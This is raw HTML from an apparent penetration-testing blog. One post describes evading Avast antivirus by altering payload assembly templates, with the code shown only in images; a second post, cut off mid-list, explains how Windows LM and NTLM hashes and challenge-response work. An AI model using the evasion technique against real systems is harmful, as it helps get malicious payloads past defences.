<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia426" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="368.85483870967744" data-react-checksum="-1102893567" data-reactid=".j" id="innercomp_txtMedia426" style="background: transparent; border: 0px; clear: both; display: block; height: 369px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 551px;" title="">
<div class="s14link" data-reactid=".j.0" id="innercomp_txtMedia426link" style="background: transparent; border: 0px; display: block; height: 369px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 551px;">
<div class="s14img" data-reactid=".j.0.0" data-state="loaded" id="innercomp_txtMedia426img" style="background: transparent; border: 0px; height: 369px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 551px;">
<img class="s14imgimage" data-reactid=".j.0.0.0" id="innercomp_txtMedia426imgimage" src="http://static.wixstatic.com/media/75fce7_812ec95952144a02b2c070b3e1776ca6.png_srb_p_542_363_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 369px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 551px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
New assembly source code listing with 8192 buffer length.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia9r8" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="132.88391640163562" data-react-checksum="1047736168" data-reactid=".k" id="innercomp_txtMedia9r8" style="background: transparent; border: 0px; clear: both; display: block; height: 133px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" title="">
<div class="s14link" data-reactid=".k.0" id="innercomp_txtMedia9r8link" style="background: transparent; border: 0px; display: block; height: 133px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 629px;">
<div class="s14img" data-reactid=".k.0.0" data-state="loaded" id="innercomp_txtMedia9r8img" style="background: transparent; border: 0px; height: 133px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 629px;">
<img class="s14imgimage" data-reactid=".k.0.0.0" id="innercomp_txtMedia9r8imgimage" src="http://static.wixstatic.com/media/75fce7_9958eadb26034a75a97d45133fe922fa.png_srb_p_629_133_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 133px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
64-bit payload using new template, and no encoding.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia8rb" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="224.56451612903226" data-react-checksum="-231657483" data-reactid=".l" id="innercomp_txtMedia8rb" style="background: transparent; border: 0px; clear: both; display: block; height: 225px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 612px;" title="">
<div class="s14link" data-reactid=".l.0" id="innercomp_txtMedia8rblink" style="background: transparent; border: 0px; display: block; height: 225px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 612px;">
<div class="s14img" data-reactid=".l.0.0" data-state="loaded" id="innercomp_txtMedia8rbimg" style="background: transparent; border: 0px; height: 225px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 612px;">
<img class="s14imgimage" data-reactid=".l.0.0.0" id="innercomp_txtMedia8rbimgimage" src="http://static.wixstatic.com/media/75fce7_d32226d9db964893b7bde2e19727e87e.png_srb_p_602_221_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 225px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 612px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
64-bit payload using new template and XOR encoding</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia1r6f" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="142.25806451612905" data-react-checksum="347353269" data-reactid=".m" id="innercomp_txtMedia1r6f" style="background: transparent; border: 0px; clear: both; display: block; height: 143px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 559px;" title="">
<div class="s14link" data-reactid=".m.0" id="innercomp_txtMedia1r6flink" style="background: transparent; border: 0px; display: block; height: 143px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 559px;">
<div class="s14img" data-reactid=".m.0.0" data-state="loaded" id="innercomp_txtMedia1r6fimg" style="background: transparent; border: 0px; height: 143px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 559px;">
<img class="s14imgimage" data-reactid=".m.0.0.0" id="innercomp_txtMedia1r6fimgimage" src="http://static.wixstatic.com/media/75fce7_15827d574e854a628d2e8cd32cf578b4.png_srb_p_550_140_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 143px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 559px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
New payloads in a directory on the Windows system!</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia11f6" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="172.74193548387098" data-react-checksum="998125665" data-reactid=".n" id="innercomp_txtMedia11f6" style="background: transparent; border: 0px; clear: both; display: block; height: 173px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 374px;" title="">
<div class="s14link" data-reactid=".n.0" id="innercomp_txtMedia11f6link" style="background: transparent; border: 0px; display: block; height: 173px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 374px;">
<div class="s14img" data-reactid=".n.0.0" data-state="loaded" id="innercomp_txtMedia11f6img" style="background: transparent; border: 0px; height: 173px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 374px;">
<img class="s14imgimage" data-reactid=".n.0.0.0" id="innercomp_txtMedia11f6imgimage" src="http://static.wixstatic.com/media/75fce7_dbe51da41bc4424aa4f18d2a217218cc.png_srb_p_368_170_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 173px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 374px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Go ahead and scan my directory...</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia18kd" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="147.33870967741933" data-react-checksum="2131636489" data-reactid=".o" id="innercomp_txtMedia18kd" style="background: transparent; border: 0px; clear: both; display: block; height: 148px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 297px;" title="">
<div class="s14link" data-reactid=".o.0" id="innercomp_txtMedia18kdlink" style="background: transparent; border: 0px; display: block; height: 148px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 297px;">
<div class="s14img" data-reactid=".o.0.0" data-state="loaded" id="innercomp_txtMedia18kdimg" style="background: transparent; border: 0px; height: 148px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 297px;">
<img class="s14imgimage" data-reactid=".o.0.0.0" id="innercomp_txtMedia18kdimgimage" src="http://static.wixstatic.com/media/75fce7_32c4b1fbf70d4e0a879412bc0b1d2466.png_srb_p_292_145_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 148px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 297px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
I am safe, what a relief!</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div id="innerContainer_txtMedia11lv" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="319.06451612903226" data-react-checksum="1422209335" data-reactid=".p" id="innercomp_txtMedia11lv" style="background: transparent; border: 0px; clear: both; display: block; height: 320px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 354px;" title="">
<div class="s14link" data-reactid=".p.0" id="innercomp_txtMedia11lvlink" style="background: transparent; border: 0px; display: block; height: 320px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 354px;">
<div class="s14img" data-reactid=".p.0.0" data-state="loaded" id="innercomp_txtMedia11lvimg" style="background: transparent; border: 0px; height: 320px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 354px;">
<img class="s14imgimage" data-reactid=".p.0.0.0" id="innercomp_txtMedia11lvimgimage" src="http://static.wixstatic.com/media/75fce7_ebaa8c74b80d445cbf93755164db5a68.png_srb_p_348_314_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 320px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 354px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Oh no, I might get caught here! Phew...</div>
<div id="innerContainer_txtMediapqj" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 10px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<div class="s14" data-content-padding-horizontal="0" data-content-padding-vertical="0" data-exact-height="101.38550658791458" data-react-checksum="-2101727034" data-reactid=".q" id="innercomp_txtMediapqj" style="background: transparent; border: 0px; clear: both; display: block; height: 102px; margin: 10px auto; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" title="">
<div class="s14link" data-reactid=".q.0" id="innercomp_txtMediapqjlink" style="background: transparent; border: 0px; display: block; height: 102px; margin: 0px; outline: 0px; overflow: hidden; padding: 0px; vertical-align: baseline; width: 629px;">
<div class="s14img" data-reactid=".q.0.0" data-state="loaded" id="innercomp_txtMediapqjimg" style="background: transparent; border: 0px; height: 102px; margin: 0px; outline: 0px; padding: 0px; position: relative; vertical-align: baseline; width: 629px;">
<img class="s14imgimage" data-reactid=".q.0.0.0" id="innercomp_txtMediapqjimgimage" src="http://static.wixstatic.com/media/75fce7_c40d87d751fc468b82882c4710798d8f.png_srb_p_629_102_75_22_0.50_1.20_0.00_png_srb" style="-webkit-user-select: none; background: transparent; border: 0px; box-shadow: rgb(0, 0, 0) 0px 0px 0px; height: 102px; margin: 0px; object-fit: contain; outline: 0px; padding: 0px; position: static; vertical-align: baseline; width: 629px;" /></div>
</div>
</div>
</div>
<div class="font_7" style="background: transparent none repeat scroll 0% 0%; border: 0px none; color: #1c1c1c; font-family: "open sans",sans-serif; font-size: 14px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; outline: 0px none; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
And now it’s shell time.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<span style="background: transparent; border: 0px; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;">Conclusion</span></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
My theory and practical experience was that AV vendors are looking at the templates rather than the shellcode itself. In this specific instance, we saw immediate success with only a minor assembly code modification and absolutely no encoding of a 64-bit shellcode payload.</div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
<br /></div>
<div class="font_9" style="-webkit-text-stroke-width: 0px; background: transparent; border: 0px; color: #1c1c1c; font-family: 'open sans', sans-serif; font-size: 12px; font-stretch: normal; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; outline: 0px; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Why choose Avast? No specific reason other than I needed a solution in a hurry to execute my test. I will be repeating the experiment with other AV engines to see what my mileage looks like. There are many possible variations on this technique but like so much in life, it is better to start simple and ramp up as needed. Happy hunting!</div>
Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2320276621879394553.post-25953673738358554482014-10-07T11:39:00.005-07:002014-10-07T11:52:42.925-07:00Post Exploitation, Metasploit and Windows Hashes<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: Verdana, sans-serif; font-size: large;">What is a
Windows hash?</span></b></h2>
<span style="font-family: Verdana, sans-serif;">A Windows hash is a non-salted algorithmic encoding of a
plaintext password. Windows has used two
different algorithms for hashing to date, the result being an LAN Manager (LM) hash, or an NT hash. In a Microsoft Windows network, NT LAN
Manager (NTLM) is a suite of protocols used to provide authentication,
integrity and confidentiality to users.
NTLM is the successor to LAN Manager (LANMAN), and attempts to provide
backwards compatibility with LANMAN.</span><br />
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">In the world of cryptography, salting is a known piece of
additional random data that is “mixed in” as an additional input to the one way
hashing function.<span style="mso-spacerun: yes;"> </span>The advantage of
salting is that the hashed representation of a password will never be the same
for the same plaintext string.<span style="mso-spacerun: yes;">
</span>Unfortunately this technique is not used with stored hashes in Windows.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">The LANMAN hash is constructed as follows:</span><br />
<ul>
<li><span style="font-family: Verdana, sans-serif; text-indent: -17.95pt;">The plaintext password is padded with NULL characters
to a length of fourteen bytes, and converted to all uppercase.</span></li>
<li><span style="font-family: Verdana, sans-serif;"><span style="text-indent: -17.95pt;">The resulting string is split into two seven character
strings.</span><span style="text-indent: -17.95pt;"> </span><span style="text-indent: -17.95pt;">Each string is used as a key to
encrypt the constant string value of </span><span style="text-indent: -17.95pt;">“KGS!@#$%”. </span><span style="text-indent: -17.95pt;">The data encryption
standard (DES) algorithm is used for encryption.</span></span></li>
<li><span style="font-family: Verdana, sans-serif;"><span style="font-size: 7pt; line-height: 115%; text-indent: -17.95pt;"> </span><span style="text-indent: -17.95pt;">The resulting ciphertext is
concatenated into a sixteen byte hash value.</span></span></li>
</ul>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">The NT hash is constructed by using the MD4 hashing algorithm
over the plaintext string. A plaintext
password, used to construct the NT hash, can be up to 256 characters in length
with mixed case and special characters.
Unlike the LM hash, special characters, upper and lower case are all
preserved with an NT hash.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<h2>
<b style="mso-bidi-font-weight: normal;"><span style="font-family: Verdana, sans-serif; font-size: large;">How is a
Windows hash passed across the network?</span></b></h2>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">From a network transmission perspective, there are two
different challenge response algorithms in use.<span style="mso-spacerun: yes;"> </span>The LANMAN, and NTLMv1 algorithm operates as
follows:<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l2 level1 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">1)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Workstation client initiates authentication<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l2 level1 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">2)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Server responds with a random challenge<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l2 level1 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">3)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Client formulates and sends a response to the challenge
by:<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">a)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Padding the LANMAN/NT hash to 21 bytes<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">b)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Splitting the hash into three seven character pieces<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: 1.0in; mso-add-space: auto; mso-list: l2 level2 lfo6; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">c)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Using each piece as a DES key to encrypt the server
challenge.<o:p></o:p></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="normal">
<span style="font-family: Verdana, sans-serif;">NTLMv2 challenge/response is significantly more secure, and
operates as follows:<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">1)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Workstation client initiates authentication<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -17.95pt;">
<!--[if !supportLists]--><span style="font-family: Verdana, sans-serif;"><span style="mso-list: Ignore;">2)<span style="font-size: 7pt; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
</span></span><!--[endif]-->Server responds with a random challenge<o:p></o:p></span></div>
<div class="normalCxSpMiddle" style="margin-left: .5in; mso-add-space: auto; mso-list: l3 level1 lfo4; text-indent: -17.95pt;">
